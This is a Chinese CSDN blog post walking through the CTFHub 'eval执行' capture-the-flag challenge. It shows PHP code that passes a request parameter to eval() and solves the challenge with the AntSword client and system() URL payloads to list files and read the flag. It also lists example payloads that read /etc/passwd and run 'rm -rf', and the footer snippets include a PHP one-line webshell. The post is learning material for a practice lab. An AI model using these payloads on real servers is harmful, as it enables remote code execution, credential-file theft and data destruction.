CTFHub | eval执行

最新推荐文章于 2024-05-17 00:00:22 发布
最新推荐文章于 2024-05-17 00:00:22 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: CTF精进之路 文章标签: CTF web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/130150626
版权

 0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

eval执行:

        (无)        

网页显示内容

        

        

0x02 解题过程

0x1 方法一: 使用蚁剑连接 

检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else 。

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

        

使用蚁剑连接 cmd 参数试试,测试连接发现可以成功连接,说明此题存在 eval 执行

        

检查目录列表发现关于 flag 的文件

        

检查文件内容发现此题 flag

        

0x2 方法二: 网页检查文件 

根据网页代码的提示,可以先把查看网页根目录文件的命令赋值给 cmd 然后执行

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls");

        

继续检查上一级文件夹,这里发现一个flag_9195的文件

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls /");

        

继续传参给cmd命令检查flag_9195的文件,发现此题flag

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_9195");

        

        

0x03 eval执行

        eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。

        

例如:

1.访问服务器敏感信息

?cmd=system('cat /etc/passwd')

2.删除网页文件

?cmd=system("rm -rf /xx/xx");

         

        

0x04 参考文献

[1].Ho1aAs. CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”[EB/OL]. [2023-04-19]. https://blog.csdn.net/Xxy605/article/details/107548841.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHUB-技能树-Web题-RCE(远程代码执行)-eval执行
Static______的博客
05-09 406
CTFHUB-技能树-Web题-RCE(远程代码执行
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 798
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTF网络安全大赛简单web题目:eval
最新发布
Pythonit教程网
05-17 1582
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
ctfhub技能树web:RCE里的eval执行和命令注入
2302_81010533的博客
03-30 398
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5641
ctf命令执行题型解题方法汇总(持续更新中)
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3841
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2170
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
mongodb eval 执行服务器端脚本
09-10
MongoDB的`db.eval`函数是一个非常强大的工具,它允许用户在服务器端执行JavaScript代码,这对于执行复杂的逻辑或实现特定的数据库操作非常有用。在本文中,我们将深入探讨`db.eval`的使用方法、存储JavaScript以及...
符号执行angr解ctf逆向题组
12-28
5. **约束解决**:学习如何处理和解决执行过程中遇到的符号表达式,如通过`solver.satisfy_one()`或`solver.eval()`获取具体值。 6. **插件与自定义分析**:根据需求编写自定义插件,以增强`angr`的功能,如添加特定...
PyPI 官网下载 | eval_hj3415-0.2.1.tar.gz
01-27
这个库可能提供了与Zookeeper交互的API,允许用户执行诸如创建、读取、更新和删除Zookeeper节点的操作,同时也可能包含了帮助处理分布式环境中的锁、事件通知等功能。由于没有具体代码内容,我们无法详细解释它的...
CTFeval
qq_74263993的博客
04-27 476
_REQUEST变量是一个关联数组,它的键是表单元素的名称,值是用户输入的数据。通过$_REQUEST变量,可以访问表单中所有输入字段的值,不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中,$_REQUEST是一个超全局变量,用于收集HTML表单提交的数据。如果代码中存在解析错误,则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码,且必须以分号结尾。
ctf 文件包含
weixin_45942044的博客
03-28 235
一、eval() 函数 一句话木马 <?php eval($_post[0]);?> eval()函数作用:将函数内的字符串当作代码来执行 使用蚁剑连接一句话木马,需要输入密码,密码值为post[]中的值。 二、通过php://filter获取flag ?php://filter/read=convert.base64-encode/resouce=flag.php 三、通过php://input获取shell ?php://input 在hackbar的post里写入&lt
php eval ctf,浅谈CTF中命令执行与绕过的小技巧
weixin_39758618的博客
03-16 1321
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载缘起lemon师傅在安全客里发表的一篇文章,总结的很详细,学到了很多姿势。但是在此我还想画蛇添足的做一些补充及解释。补充一下命令执行的漏洞。空格绕过< 符号%09 符号需要php环境,这里就不搭建啦,见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在...
ctfhub-eval执行
m0_65766842的博客
02-28 221
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 4653
CTF之路:关于PHP eval() 注入问题
eval-Bugku CTF
m0_56859693的博客
09-05 1431
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
CTFweb)中的常见php函数意义与用法
qq_52907838的博客
04-05 1391
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 833
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
ctfhub DOM型xss
07-28
CTFHub 是一个知名的 CTF 平台,DOM 型 XSS 是其中的一种常见的漏洞类型。DOM(Document Object Model)型 XSS 漏洞是指攻击者通过修改网页的 DOM 结构,注入恶意的脚本代码,并在用户浏览器中执行,从而实现攻击目标的攻击方式。 要进行 DOM 型 XSS 攻击,攻击者通常会利用网站前端的 JavaScript 代码中存在的漏洞,通过修改 DOM 树结构来注入恶意脚本。这些脚本可以窃取用户的敏感信息、劫持用户会话、篡改页面内容等。 防御 DOM 型 XSS 攻击的方法主要包括以下几点: 1. 输入过滤和验证:对用户输入的数据进行过滤和验证,确保只允许合法的数据进入系统。 2. 输出编码:将输出到页面的数据进行适当的编码,防止恶意脚本被执行。 3. 使用安全的 API:避免使用不安全的 DOM 操作函数,例如 innerHTML、eval 等。 4. Content Security Policy(CSP):设置合适的 CSP 策略,限制页面中可执行的脚本来源。 5. 使用浏览器提供的防护机制:现代浏览器已经提供了一些内置的防护机制,如跨站脚本保护(XSS Auditor)等。 希望这些信息对你有帮助,如果你有其他问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值